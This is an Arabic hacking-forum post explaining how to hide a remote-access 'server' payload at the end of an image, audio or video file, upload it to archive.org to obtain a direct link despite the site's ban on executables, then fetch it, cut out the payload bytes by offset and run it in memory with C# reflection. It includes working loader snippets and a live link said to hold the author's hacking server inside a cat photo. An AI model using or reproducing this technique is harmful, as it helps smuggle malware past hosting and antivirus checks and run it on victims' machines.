03.10.2017 حل مشكلة الحصول على مواقع رفع تعطي روابط مباشرة للامتدادات التنفيذية


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
حياكم الله ياشباب
فقط موضوع للتحلية فكرت فيه منذ زمن
وشفت الان عندي وقت قلت بنزله ..
رايت الكثير ممن يعانون من كيفية الحصول على رابط مباشر لملفهم التنفيذي
هذا في حال عمل داونلودر او قراءة بايتات الملف مباشرة بدون نزولها على الهارد
كما تم شرحه مسبقا هنا
Load Your Server From The Link [Load Directly In Memory]
الخلاصة في الطريقة انا تطرقت لها مسبقا
وهي باختصار ليكن لدينا الصورة الفديو المقطع الصوتي التالي ذو الاسم
Bashar.mp3 - Bashar.jpg - Bashar.mp4
الامتدادات على سبيل المثل وليس الحصر
ولدينا موقع مثل
archive.org
يتيح لنا الحصول على روابط مباشرة لكافة الملفات عدا التنفيذية
وطبعا هذا الموقع كمثال فقط
ان قمنا كما شرحنا من قبل وفي كثير من المواضيع
بقراءة length الملف الاصلي وهوة الصورة الفديو الصوت الخ
واصبح لدينا اللينجث الخاص به وليكن
C#:
311485
طبعا للحصول على لينجث اي ملف اتبع الكود الموالي كما تم شرحه منذ زمن

C#:
Int64 i = new FileInfo("D:\\meine.jpg").Length;
            File.WriteAllText(@"D:\lenght.txt", i.ToString());
ووضعنا قيم سيرفرنا سواءا اكانت مشفرة اي متلاعب بها
او وضعناها بالشكل النهائي بعد فك التشفير .."براحتك"
ان وضعنا بايتات السيرفر هكساته في اخر هذا الملف
وقمنا برفعه على موقع الاركايف ف ان الموقع سيقبله دون اي مشكلة ويعطيك رابط مباشر له
طيب الان كيف سنقوم بقراءة بايتات سيرفرنا بدون قراءة بايتات الملف الاصل
قمنا بالتطرق لهذا في اكثر من اربع مواضيع سابقة
مثال هنا
VirusTotal 0/55 Add Offests [Run Time[لغم براحتك :)]
الفانكشن المطلوبة هي
C#:
static byte[] hh(byte[] bb)
        {
            var test2 = new byte[16896];
            Array.Copy(bb, 311485, test2, 0, test2.Length);
            return test2;
        }
حيث انه سنقوم بتخزين بايتات سيرفرنا في مصفوفة ولتكن test2
والرقم 16896 هو لينجث السيرفر حصلنا عليه من خلال الكود السابق ذكره
ورح يتم نسخ مصفوفة جديدة تبدا من عند 311485 وهو الرقم الذي ينتهي عنده طول الملف الخاص بالصورة الاصل
والذي يبدا عنده لينجث ملفنا الهدف "السيرفر" سيتم تخزين بايتات سيرفرنا في test2
الان اصبح لدينا سيرفر مخزن في مصفوفة بايت ..
تستطيع جلبه بالطريقة التي تريد وعلى سبيل المثال هنا
Load Your Server From The Link [Load Directly In Memory]
وان اردت دام انه لديك بايت تستطيع كتابته على الهارد او اي ماشئت ان تفعله به
C#:
System.Reflection.Assembly.Load(hh(Microsoft().Result)).EntryPoint.Invoke(null, null);
انا قمت بتشغيله مباشرة بالذاكرة والسيرفر غير مشفر
ان اردنا جعله مشفرا باحد الخوارزميات ومن ثم اضافة فانكشن فك التشفير
ومن ثم فك تشفير بايتات السيرفر عند عمل load لايوجد اي مشكلة

الان الصورة الموالية تحتوي على صورة "honey" قطي العزيز ههه
وايضا تحتوي على سيرفرنا للاختراق
ولدينا رابط مباشر لسيرفرنا بشكل ما او باخر ونستطيع استخدامه
مع ان الموقع لايسمح ابدا بالامتدادات التنفيذية "يمكنك التجريب"
https://archive.org/download/meine/meine.jpg
قد يكون للحركة هذه ايضا بعض التمويه ولكن اي فاحص يعلم بالبرمجة
سيعلم مهمة الفانكشن ويستخلص بايتات السيرفر في النهاية ولو كان مشفرا
اذ ان خوارزمية فك التشفير ان كانت البايتات مشفرة ستكون فانكشن فك التشفير ايضا مضمنة
ولكنها تبقى افضل بكثير من الطريقة التقليدية ..




الفديو بالمرفقات
 

المرفقات